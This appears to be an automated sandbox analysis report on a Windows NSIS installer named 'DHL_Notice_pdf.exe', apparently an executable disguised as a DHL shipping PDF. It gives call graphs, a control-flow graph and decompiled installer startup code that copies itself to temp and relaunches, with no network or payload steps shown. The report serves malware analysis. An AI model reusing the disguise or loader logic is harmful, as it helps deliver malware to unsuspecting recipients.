4646 40540b 4643->4646 4644->4648 4645 40526a GetWindowLongW SetWindowLongW 4647 405283 4645->4647 4657 40541c SendMessageW 4646->4657 4650 4052a0 4647->4650 4651 405288 ShowWindow 4647->4651 4648->4642 4665 4054ac 4648->4665 4677 404fff 4648->4677 4649->4631 4671 4045f9 SendMessageW 4650->4671 4670 4045f9 SendMessageW 4651->4670 4652->4625 4652->4638 4653->4645 4656 4051e2 SendMessageW 4653->4656 4658 405265 4653->4658 4659 405220 SendMessageW 4653->4659 4660 405234 SendMessageW 4653->4660 4656->4653 4657->4627 4658->4645 4658->4647 4659->4653 4660->4653 4662 4055b6 4663 4055c1 InvalidateRect 4662->4663 4666 4055cd 4662->4666 4663->4666 4664 4054da SendMessageW 4668 4054f0 4664->4668 4665->4664 4665->4668 4666->4642 4686 404f3a 4666->4686 4667 405564 SendMessageW SendMessageW 4667->4668 4668->4662 4668->4667 4670->4631 4671->4620 4673 404fa2 GetMessagePos ScreenToClient SendMessageW 4672->4673 4674 404fde SendMessageW 4672->4674 4675 404fd6 4673->4675 4676 404fdb 4673->4676 4674->4675 4675->4652 4676->4674 4689 406668 lstrcpynW 4677->4689 4679 405012 4690 4065af wsprintfW 4679->4690 4681 40501c 4682 40140b 2 API calls 4681->4682 4683 405025 4682->4683 4691 406668 lstrcpynW 4683->4691 4685 40502c 4685->4665 4692 404e71 4686->4692 4688 404f4f 4688->4642 4689->4679 4690->4681 4691->4685 4693 404e8a 4692->4693 4694 4066a5 17 API calls 4693->4694 4695 404eee 4694->4695 4696 4066a5 17 API calls 4695->4696 4697 404ef9 4696->4697 4698 4066a5 17 API calls 4697->4698 4699 404f0f lstrlenW wsprintfW SetDlgItemTextW 4698->4699 4699->4688 4705 4023b2 4706 4023ba 4705->4706 4709 4023c0 4705->4709 4707 402da6 17 API calls 4706->4707 4707->4709 4708 4023ce 4711 4023dc 4708->4711 4712 402da6 17 API calls 4708->4712 4709->4708 4710 402da6 17 API calls 4709->4710 4710->4708 4713 402da6 17 API calls 4711->4713 4712->4711 4714 4023e5 WritePrivateProfileStringW 4713->4714 4715 404734 lstrlenW 4716 404753 4715->4716 4717 404755 WideCharToMultiByte 4715->4717 4716->4717 4718 402434 4719 402467 4718->4719 4720 40243c 4718->4720 4722 402da6 17 API calls 4719->4722 4721 402de6 17 API calls 4720->4721 4723 402443 4721->4723 4724 40246e 4722->4724 4726 402da6 17 API calls 4723->4726 4728 40247b 4723->4728 4729 402e64 4724->4729 4727 402454 RegDeleteValueW RegCloseKey 4726->4727 4727->4728 4730 402e78 4729->4730 4732 402e71 4729->4732 4730->4732 4733 402ea9 4730->4733 4732->4728 4734 4064d5 RegOpenKeyExW 4733->4734 4735 402ed7 4734->4735 4736 402ee7 RegEnumValueW 4735->4736 4743 402f81 4735->4743 4745 402f0a 4735->4745 4737 402f71 RegCloseKey 4736->4737 4736->4745 4737->4743 4738 402f46 RegEnumKeyW 4739 402f4f RegCloseKey 4738->4739 4738->4745 4740 406a35 5 API calls 4739->4740 4741 402f5f 4740->4741 4741->4743 4744 402f63 RegDeleteKeyW 4741->4744 4742 402ea9 6 API calls 4742->4745 4743->4732 4744->4743 4745->4737 4745->4738 4745->4739 4745->4742 4746 401735 4747 402da6 17 API calls 4746->4747 4748 40173c SearchPathW 4747->4748 4749 401757 4748->4749 4750 404ab5 4751 404ae1 4750->4751 4752 404af2 4750->4752 4811 405cac GetDlgItemTextW 4751->4811 4754 404afe GetDlgItem 4752->4754 4759 404b5d 4752->4759 4757 404b12 4754->4757 4755 404c41 4760 404df0 4755->4760 4813 405cac GetDlgItemTextW 4755->4813 4756 404aec 4758 4068ef 5 API calls 4756->4758 4762 404b26 SetWindowTextW 4757->4762 4763 405fe2 4 API calls 4757->4763 4758->4752 4759->4755 4759->4760 4764 4066a5 17 API calls 4759->4764 4767 40462b 8 API calls 4760->4767 4766 4045c4 18 API calls 4762->4766 4768 404b1c 4763->4768 4769 404bd1 SHBrowseForFolderW 4764->4769 4765 404c71 4770 40603f 18 API calls 4765->4770 4771 404b42 4766->4771 4772 404e04 4767->4772 4768->4762 4776 405f37 3 API calls 4768->4776 4769->4755 4773 404be9 CoTaskMemFree 4769->4773 4774 404c77 4770->4774 4775 4045c4 18 API calls 4771->4775 4777 405f37 3 API calls 4773->4777 4814 406668 lstrcpynW 4774->4814 4778 404b50 4775->4778 4776->4762 4779 404bf6 4777->4779 4812 4045f9 SendMessageW 4778->4812 4782 404c2d SetDlgItemTextW 4779->4782 4787 4066a5 17 API calls 4779->4787 4782->4755 4783 404b56 4785 406a35 5 API calls 4783->4785 4784 404c8e 4786 406a35 5 API calls 4784->4786 4785->4759 4793 404c95 4786->4793 4788 404c15 lstrcmpiW 4787->4788 4788->4782 4791 404c26 lstrcatW 4788->4791 4789 404cd6 4815 406668 lstrcpynW 4789->4815 4791->4782 4792 404cdd 4794 405fe2 4 API calls 4792->4794 4793->4789 4797 405f83 2 API calls 4793->4797 4799 404d2e 4793->4799 4795 404ce3 GetDiskFreeSpaceW 4794->4795 4798 404d07 MulDiv 4795->4798 4795->4799 4797->4793 4798->4799 4801 404f3a 20 API calls 4799->4801 4809 404d9f 4799->4809 4800 404dc2 4816 4045e6 EnableWindow 4800->4816 4803 404d8c 4801->4803 4802 40140b 2 API calls 4802->4800 4805 404da1 SetDlgItemTextW 4803->4805 4806 404d91 4803->4806 4805->4809 4807 404e71 20 API calls 4806->4807 4807->4809 4808 404dde 4808->4760 4810 404a0e SendMessageW 4808->4810 4809->4800 4809->4802 4810->4760 4811->4756 4812->4783 4813->4765 4814->4784 4815->4792 4816->4808 4817 401d38 4818 402d84 17 API calls 4817->4818 4819 401d3f 4818->4819 4820 402d84 17 API calls 4819->4820 4821 401d4b GetDlgItem 4820->4821 4822 402638 4821->4822 4823 4014b8 4824 4014be 4823->4824 4825 401389 2 API calls 4824->4825 4826 4014c6 4825->4826 4827 40563e 4828 405662 4827->4828 4829 40564e 4827->4829 4832 40566a IsWindowVisible 4828->4832 4838 405681 4828->4838 4830 405654 4829->4830 4831 4056ab 4829->4831 4834 404610 SendMessageW 4830->4834 4833 4056b0 CallWindowProcW 4831->4833 4832->4831 4835 405677 4832->4835 4836 40565e 4833->4836 4834->4836 4837 404f7f 5 API calls 4835->4837 4837->4838 4838->4833 4839 404fff 4 API calls 4838->4839 4839->4831 4840 40263e 4841 402652 4840->4841 4842 40266d 4840->4842 4843 402d84 17 API calls 4841->4843 4844 402672 4842->4844 4845 40269d 4842->4845 4854 402659 4843->4854 4847 402da6 17 API calls 4844->4847 4846 402da6 17 API calls 4845->4846 4849 4026a4 lstrlenW 4846->4849 4848 402679 4847->4848 4857 40668a WideCharToMultiByte 4848->4857 4849->4854 4851 40268d lstrlenA 4851->4854 4852 4026e7 4853 4026d1 4853->4852 4855 40620a WriteFile 4853->4855 4854->4852 4854->4853 4856 406239 5 API calls 4854->4856 4855->4852 4856->4853 4857->4851

                                                            Executed Functions

                                                            Function 00403640 Relevance: 91.4, APIs: 34, Strings: 18, Instructions: 450stringfilecomCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 403640-403690 SetErrorMode GetVersionExW 1 403692-4036c6 GetVersionExW 0->1 2 4036ca-4036d1 0->2 1->2 3 4036d3 2->3 4 4036db-40371b 2->4 3->4 5 40371d-403725 call 406a35 4->5 6 40372e 4->6 5->6 11 403727 5->11 8 403733-403747 call 4069c5 lstrlenA 6->8 13 403749-403765 call 406a35 * 3 8->13 11->6 20 403776-4037d8 #17 OleInitialize SHGetFileInfoW call 406668 GetCommandLineW call 406668 13->20 21 403767-40376d 13->21 28 4037e1-4037f4 call 405f64 CharNextW 20->28 29 4037da-4037dc 20->29 21->20 25 40376f 21->25 25->20 32 4038eb-4038f1 28->32 29->28 33 4038f7 32->33 34 4037f9-4037ff 32->34 37 40390b-403925 GetTempPathW call 40360f 33->37 35 403801-403806 34->35 36 403808-40380e 34->36 35->35 35->36 38 403810-403814 36->38 39 403815-403819 36->39 47 403927-403945 GetWindowsDirectoryW lstrcatW call 40360f 37->47 48 40397d-403995 DeleteFileW call 4030d0 37->48 38->39 41 4038d9-4038e7 call 405f64 39->41 42 40381f-403825 39->42 41->32 58 4038e9-4038ea 41->58 45 403827-40382e 42->45 46 40383f-403878 42->46 51 403830-403833 45->51 52 403835 45->52 53 403894-4038ce 46->53 54 40387a-40387f 46->54 47->48 62 403947-403977 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40360f 47->62 64 40399b-4039a1 48->64 65 403b6c-403b7a ExitProcess OleUninitialize 48->65 51->46 51->52 52->46 56 4038d0-4038d4 53->56 57 4038d6-4038d8 53->57 54->53 60 403881-403889 54->60 56->57 63 4038f9-403906 call 406668 56->63 57->41 58->32 66 403890 60->66 67 40388b-40388e 60->67 62->48 62->65 63->37 69 4039a7-4039ba call 405f64 64->69 70 403a48-403a4f call 403d17 64->70 72 403b91-403b97 65->72 73 403b7c-403b8b call 405cc8 ExitProcess 65->73 66->53 67->53 67->66 88 403a0c-403a19 69->88 89 4039bc-4039f1 69->89 83 403a54-403a57 70->83 74 403b99-403bae GetCurrentProcess OpenProcessToken 72->74 75 403c0f-403c17 72->75 80 403bb0-403bd9 LookupPrivilegeValueW AdjustTokenPrivileges 74->80 81 403bdf-403bed call 406a35 74->81 84 403c19 75->84 85 403c1c-403c1f ExitProcess 75->85 80->81 95 403bfb-403c06 ExitWindowsEx 81->95 96 403bef-403bf9 81->96 83->65 84->85 90 403a1b-403a29 call 40603f 88->90 91 403a5c-403a70 call 405c33 lstrcatW 88->91 93 4039f3-4039f7 89->93 90->65 104 403a2f-403a45 call 406668 * 2 90->104 107 403a72-403a78 lstrcatW 91->107 108 403a7d-403a97 lstrcatW lstrcmpiW 91->108 98 403a00-403a08 93->98 99 4039f9-4039fe 93->99 95->75 101 403c08-403c0a call 40140b 95->101 96->95 96->101 98->93 103 403a0a 98->103 99->98 99->103 101->75 103->88 104->70 107->108 109 403b6a 108->109 110 403a9d-403aa0 108->110 109->65 112 403aa2-403aa7 call 405b99 110->112 113 403aa9 call 405c16 110->113 119 403aae-403abe SetCurrentDirectoryW 112->119 113->119 121 403ac0-403ac6 call 406668 119->121 122 403acb-403af7 call 406668 119->122 121->122 126 403afc-403b17 call 4066a5 DeleteFileW 122->126 129 403b57-403b61 126->129 130 403b19-403b29 CopyFileW 126->130 129->126 132 403b63-403b65 call 406428 129->132 130->129 131 403b2b-403b4b call 406428 call 4066a5 call 405c4b 130->131 131->129 140 403b4d-403b54 CloseHandle 131->140 132->109 140->129
                                                            C-Code - Quality: 78%
                                                            			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				WCHAR* _t92;
				char* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t119;
				intOrPtr* _t123;
				void* _t137;
				void* _t143;
				void* _t148;
				void* _t152;
				void* _t157;
				signed int _t167;
				void* _t170;
				void* _t175;
				intOrPtr _t177;
				intOrPtr _t178;
				intOrPtr* _t179;
				int _t188;
				void* _t189;
				void* _t198;
				signed int _t204;
				signed int _t209;
				signed int _t214;
				signed int _t216;
				int* _t218;
				signed int _t226;
				signed int _t229;
				CHAR* _t231;
				char* _t232;
				signed int _t233;
				WCHAR* _t234;
				void* _t250;

				_t216 = 0x20;
				_t188 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x42a318 = _v324.dwBuildNumber;
				 *0x42a31c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x42a31e != 0x600) {
					_t179 = E00406A35(_t188);
					if(_t179 != _t188) {
						 *_t179(0xc00);
					}
				}
				_t231 = "UXTHEME";
				do {
					E004069C5(_t231); // executed
					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
				} while ( *_t231 != 0);
				E00406A35(0xb);
				 *0x42a264 = E00406A35(9);
				_t88 = E00406A35(7);
				if(_t88 != _t188) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x42a31c =  *0x42a31c | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t188); // executed
				 *0x42a320 = _t88;
				SHGetFileInfoW(0x421708, _t188,  &_v1016, 0x2b4, _t188); // executed
				E00406668(0x429260, L"NSIS Error");
				_t92 = GetCommandLineW();
				_t232 = L"\"C:\\Users\\hardz\\Desktop\\DHL_Notice_pdf.exe\"";
				E00406668(_t232, _t92);
				_t94 = _t232;
				_t233 = 0x22;
				 *0x42a260 = 0x400000;
				_t250 = L"\"C:\\Users\\hardz\\Desktop\\DHL_Notice_pdf.exe\"" - _t233; // 0x22
				if(_t250 == 0) {
					_t216 = _t233;
					_t94 =  &M00435002;
				}
				_t198 = CharNextW(E00405F64(_t94, _t216));
				_v16 = _t198;
				while(1) {
					_t97 =  *_t198;
					_t251 = _t97 - _t188;
					if(_t97 == _t188) {
						break;
					}
					_t209 = 0x20;
					__eflags = _t97 - _t209;
					if(_t97 != _t209) {
						L17:
						__eflags =  *_t198 - _t233;
						_v12 = _t209;
						if( *_t198 == _t233) {
							_v12 = _t233;
							_t198 = _t198 + 2;
							__eflags = _t198;
						}
						__eflags =  *_t198 - 0x2f;
						if( *_t198 != 0x2f) {
							L32:
							_t198 = E00405F64(_t198, _v12);
							__eflags =  *_t198 - _t233;
							if(__eflags == 0) {
								_t198 = _t198 + 2;
								__eflags = _t198;
							}
							continue;
						} else {
							_t198 = _t198 + 2;
							__eflags =  *_t198 - 0x53;
							if( *_t198 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t214 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t226 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t214;
								__eflags =  *_t198 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214);
								if( *_t198 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t209 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t229 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t209;
									__eflags =  *(_t198 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209);
									if( *(_t198 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209)) {
										L31:
										_t233 = 0x22;
										goto L32;
									}
									__eflags =  *_t198 - _t229;
									if( *_t198 == _t229) {
										 *(_t198 - 4) = _t188;
										__eflags = _t198;
										E00406668(L"C:\\Users\\hardz\\AppData\\Local\\Temp", _t198);
										L37:
										_t234 = L"C:\\Users\\hardz\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t234);
										_t116 = E0040360F(_t198, _t251);
										_t252 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"1033"); // executed
											_t118 = E004030D0(_t254, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t188) {
												L68:
												ExitProcess(); // executed
												__imp__OleUninitialize(); // executed
												if(_v8 == _t188) {
													if( *0x42a2f4 == _t188) {
														L77:
														_t119 =  *0x42a30c;
														if(_t119 != 0xffffffff) {
															_v24 = _t119;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
													}
													_t123 = E00406A35(4);
													if(_t123 == _t188) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t188);
														_push(_t188);
														_push(_t188);
														if( *_t123() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405CC8(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x42a27c == _t188) {
												L51:
												 *0x42a30c =  *0x42a30c | 0xffffffff;
												_v24 = E00403D17(_t264);
												goto L68;
											}
											_t218 = E00405F64(L"\"C:\\Users\\hardz\\Desktop\\DHL_Notice_pdf.exe\"", _t188);
											if(_t218 < L"\"C:\\Users\\hardz\\Desktop\\DHL_Notice_pdf.exe\"") {
												L48:
												_t263 = _t218 - L"\"C:\\Users\\hardz\\Desktop\\DHL_Notice_pdf.exe\"";
												_v8 = L"Error launching installer";
												if(_t218 < L"\"C:\\Users\\hardz\\Desktop\\DHL_Notice_pdf.exe\"") {
													_t189 = E00405C33(__eflags);
													lstrcatW(_t234, L"~nsu");
													__eflags = _t189;
													if(_t189 != 0) {
														lstrcatW(_t234, "A");
													}
													lstrcatW(_t234, L".tmp");
													_t219 = L"C:\\Users\\hardz\\Desktop";
													_t137 = lstrcmpiW(_t234, L"C:\\Users\\hardz\\Desktop");
													__eflags = _t137;
													if(_t137 == 0) {
														L67:
														_t188 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t189;
														_push(_t234);
														if(_t189 == 0) {
															E00405C16();
														} else {
															E00405B99();
														}
														SetCurrentDirectoryW(_t234);
														__eflags = L"C:\\Users\\hardz\\AppData\\Local\\Temp"; // 0x43
														if(__eflags == 0) {
															E00406668(L"C:\\Users\\hardz\\AppData\\Local\\Temp", _t219);
														}
														E00406668(0x42b000, _v16);
														_t201 = "A" & 0x0000ffff;
														_t143 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t143;
														_v12 = 0x1a;
														 *0x42b800 = _t143;
														do {
															E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x120)));
															DeleteFileW(0x420f08);
															__eflags = _v8;
															if(_v8 != 0) {
																_t148 = CopyFileW(L"C:\\Users\\hardz\\Desktop\\DHL_Notice_pdf.exe", 0x420f08, 1);
																__eflags = _t148;
																if(_t148 != 0) {
																	E00406428(_t201, 0x420f08, 0);
																	E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x124)));
																	_t152 = E00405C4B(0x420f08);
																	__eflags = _t152;
																	if(_t152 != 0) {
																		CloseHandle(_t152);
																		_v8 = 0;
																	}
																}
															}
															 *0x42b800 =  *0x42b800 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E00406428(_t201, _t234, 0);
														goto L67;
													}
												}
												 *_t218 = _t188;
												_t221 =  &(_t218[2]);
												_t157 = E0040603F(_t263,  &(_t218[2]));
												_t264 = _t157;
												if(_t157 == 0) {
													goto L68;
												}
												E00406668(L"C:\\Users\\hardz\\AppData\\Local\\Temp", _t221);
												E00406668(L"C:\\Users\\hardz\\AppData\\Local\\Temp", _t221);
												_v8 = _t188;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t204 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t167 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
											while( *_t218 != _t204 || _t218[1] != _t167) {
												_t218 = _t218;
												if(_t218 >= L"\"C:\\Users\\hardz\\Desktop\\DHL_Notice_pdf.exe\"") {
													continue;
												}
												break;
											}
											_t188 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t234, 0x3fb);
										lstrcatW(_t234, L"\\Temp");
										_t170 = E0040360F(_t198, _t252);
										_t253 = _t170;
										if(_t170 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t234);
										lstrcatW(_t234, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t234);
										SetEnvironmentVariableW(L"TMP", _t234);
										_t175 = E0040360F(_t198, _t253);
										_t254 = _t175;
										if(_t175 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
									goto L29;
								}
								_t177 =  *((intOrPtr*)(_t198 + 8));
								__eflags = _t177 - 0x20;
								if(_t177 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t177 - _t188;
								if(_t177 != _t188) {
									goto L29;
								}
								goto L28;
							}
							_t178 =  *((intOrPtr*)(_t198 + 2));
							__eflags = _t178 - _t209;
							if(_t178 == _t209) {
								L23:
								 *0x42a300 = 1;
								goto L24;
							}
							__eflags = _t178 - _t188;
							if(_t178 != _t188) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t198 = _t198 + 2;
						__eflags =  *_t198 - _t209;
					} while ( *_t198 == _t209);
					goto L17;
				}
				goto L37;
			}



















































                                                            0x0040364e
                                                            0x0040364f
                                                            0x00403656
                                                            0x00403659
                                                            0x00403660
                                                            0x00403663
                                                            0x00403676
                                                            0x0040367c
                                                            0x0040367f
                                                            0x00403682
                                                            0x00403690
                                                            0x00403698
                                                            0x004036a3
                                                            0x004036bc
                                                            0x004036be
                                                            0x004036c6
                                                            0x004036c6
                                                            0x004036d1
                                                            0x004036d3
                                                            0x004036d3
                                                            0x004036e8
                                                            0x0040370d
                                                            0x0040371b
                                                            0x0040371e
                                                            0x00403725
                                                            0x0040372c
                                                            0x0040372c
                                                            0x00403725
                                                            0x0040372e
                                                            0x00403733
                                                            0x00403734
                                                            0x00403740
                                                            0x00403744
                                                            0x0040374b
                                                            0x00403759
                                                            0x0040375e
                                                            0x00403765
                                                            0x00403769
                                                            0x0040376d
                                                            0x0040376f
                                                            0x0040376f
                                                            0x0040376d
                                                            0x00403776
                                                            0x0040377d
                                                            0x00403783
                                                            0x0040379b
                                                            0x004037ab
                                                            0x004037b0
                                                            0x004037b6
                                                            0x004037bd
                                                            0x004037c4
                                                            0x004037c6
                                                            0x004037c7
                                                            0x004037d1
                                                            0x004037d8
                                                            0x004037da
                                                            0x004037dc
                                                            0x004037dc
                                                            0x004037ef
                                                            0x004037f1
                                                            0x004038eb
                                                            0x004038eb
                                                            0x004038ee
                                                            0x004038f1
                                                            0x00000000
                                                            0x00000000
                                                            0x004037fb
                                                            0x004037fc
                                                            0x004037ff
                                                            0x00403808
                                                            0x00403808
                                                            0x0040380b
                                                            0x0040380e
                                                            0x00403811
                                                            0x00403814
                                                            0x00403814
                                                            0x00403814
                                                            0x00403815
                                                            0x00403819
                                                            0x004038d9
                                                            0x004038e2
                                                            0x004038e4
                                                            0x004038e7
                                                            0x004038ea
                                                            0x004038ea
                                                            0x004038ea
                                                            0x00000000
                                                            0x0040381f
                                                            0x00403820
                                                            0x00403821
                                                            0x00403825
                                                            0x0040383f
                                                            0x00403846
                                                            0x00403859
                                                            0x0040385a
                                                            0x0040386f
                                                            0x00403874
                                                            0x00403876
                                                            0x00403878
                                                            0x00403894
                                                            0x0040389b
                                                            0x004038ae
                                                            0x004038af
                                                            0x004038c4
                                                            0x004038ca
                                                            0x004038cc
                                                            0x004038ce
                                                            0x004038d6
                                                            0x004038d8
                                                            0x00000000
                                                            0x004038d8
                                                            0x004038d2
                                                            0x004038d4
                                                            0x004038f9
                                                            0x004038fd
                                                            0x00403906
                                                            0x0040390b
                                                            0x00403911
                                                            0x0040391c
                                                            0x0040391e
                                                            0x00403923
                                                            0x00403925
                                                            0x0040397d
                                                            0x00403982
                                                            0x0040398b
                                                            0x00403992
                                                            0x00403995
                                                            0x00403b6c
                                                            0x00403b6c
                                                            0x00403b71
                                                            0x00403b7a
                                                            0x00403b97
                                                            0x00403c0f
                                                            0x00403c0f
                                                            0x00403c17
                                                            0x00403c19
                                                            0x00403c19
                                                            0x00403c1f
                                                            0x00403c1f
                                                            0x00403bae
                                                            0x00403bba
                                                            0x00403bcb
                                                            0x00403bd2
                                                            0x00403bd9
                                                            0x00403bd9
                                                            0x00403be1
                                                            0x00403bed
                                                            0x00403bfb
                                                            0x00403c06
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00403bef
                                                            0x00403bef
                                                            0x00403bf0
                                                            0x00403bf2
                                                            0x00403bf3
                                                            0x00403bf4
                                                            0x00403bf9
                                                            0x00403c08
                                                            0x00403c0a
                                                            0x00000000
                                                            0x00403c0a
                                                            0x00000000
                                                            0x00403bf9
                                                            0x00403bed
                                                            0x00403b84
                                                            0x00403b8b
                                                            0x00403b8b
                                                            0x004039a1
                                                            0x00403a48
                                                            0x00403a48
                                                            0x00403a54
                                                            0x00000000
                                                            0x00403a54
                                                            0x004039b2
                                                            0x004039ba
                                                            0x00403a0c
                                                            0x00403a0c
                                                            0x00403a12
                                                            0x00403a19
                                                            0x00403a67
                                                            0x00403a69
                                                            0x00403a6e
                                                            0x00403a70
                                                            0x00403a78
                                                            0x00403a78
                                                            0x00403a83
                                                            0x00403a88
                                                            0x00403a8f
                                                            0x00403a95
                                                            0x00403a97
                                                            0x00403b6a
                                                            0x00403b6a
                                                            0x00403b6a
                                                            0x00000000
                                                            0x00403a9d
                                                            0x00403a9d
                                                            0x00403a9f
                                                            0x00403aa0
                                                            0x00403aa9
                                                            0x00403aa2
                                                            0x00403aa2
                                                            0x00403aa2
                                                            0x00403aaf
                                                            0x00403ab7
                                                            0x00403abe
                                                            0x00403ac6
                                                            0x00403ac6
                                                            0x00403ad3
                                                            0x00403adf
                                                            0x00403ae9
                                                            0x00403ae9
                                                            0x00403aeb
                                                            0x00403af2
                                                            0x00403afc
                                                            0x00403b08
                                                            0x00403b0e
                                                            0x00403b14
                                                            0x00403b17
                                                            0x00403b21
                                                            0x00403b27
                                                            0x00403b29
                                                            0x00403b2d
                                                            0x00403b3e
                                                            0x00403b44
                                                            0x00403b49
                                                            0x00403b4b
                                                            0x00403b4e
                                                            0x00403b54
                                                            0x00403b54
                                                            0x00403b4b
                                                            0x00403b29
                                                            0x00403b57
                                                            0x00403b5e
                                                            0x00403b5e
                                                            0x00403b5e
                                                            0x00403b5e
                                                            0x00403b65
                                                            0x00000000
                                                            0x00403b65
                                                            0x00403a97
                                                            0x00403a1b
                                                            0x00403a1e
                                                            0x00403a22
                                                            0x00403a27
                                                            0x00403a29
                                                            0x00000000
                                                            0x00000000
                                                            0x00403a35
                                                            0x00403a40
                                                            0x00403a45
                                                            0x00000000
                                                            0x00403a45
                                                            0x004039c3
                                                            0x004039db
                                                            0x004039ec
                                                            0x004039ed
                                                            0x004039f1
                                                            0x004039f3
                                                            0x00403a01
                                                            0x00403a08
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00403a08
                                                            0x00403a0a
                                                            0x00000000
                                                            0x00403a0a
                                                            0x0040392d
                                                            0x00403939
                                                            0x0040393e
                                                            0x00403943
                                                            0x00403945
                                                            0x00000000
                                                            0x00000000
                                                            0x0040394d
                                                            0x00403955
                                                            0x00403966
                                                            0x0040396e
                                                            0x00403970
                                                            0x00403975
                                                            0x00403977
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00403977
                                                            0x00000000
                                                            0x004038d4
                                                            0x0040387d
                                                            0x0040387f
                                                            0x00000000
                                                            0x00000000
                                                            0x00403881
                                                            0x00403885
                                                            0x00403889
                                                            0x00403890
                                                            0x00403890
                                                            0x00403890
                                                            0x00403890
                                                            0x00000000
                                                            0x00403890
                                                            0x0040388b
                                                            0x0040388e
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0040388e
                                                            0x00403827
                                                            0x0040382b
                                                            0x0040382e
                                                            0x00403835
                                                            0x00403835
                                                            0x00000000
                                                            0x00403835
                                                            0x00403830
                                                            0x00403833
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00403833
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00403801
                                                            0x00403801
                                                            0x00403802
                                                            0x00403803
                                                            0x00403803
                                                            0x00000000
                                                            0x00403801
                                                            0x00000000

                                                            APIs
                                                            • SetErrorMode.KERNELBASE(00008001), ref: 00403663
                                                            • GetVersionExW.KERNEL32(?), ref: 0040368C
                                                            • GetVersionExW.KERNEL32(0000011C), ref: 004036A3
                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040373A
                                                            • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403776
                                                            • OleInitialize.OLE32(00000000), ref: 0040377D
                                                            • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 0040379B
                                                            • GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 004037B0
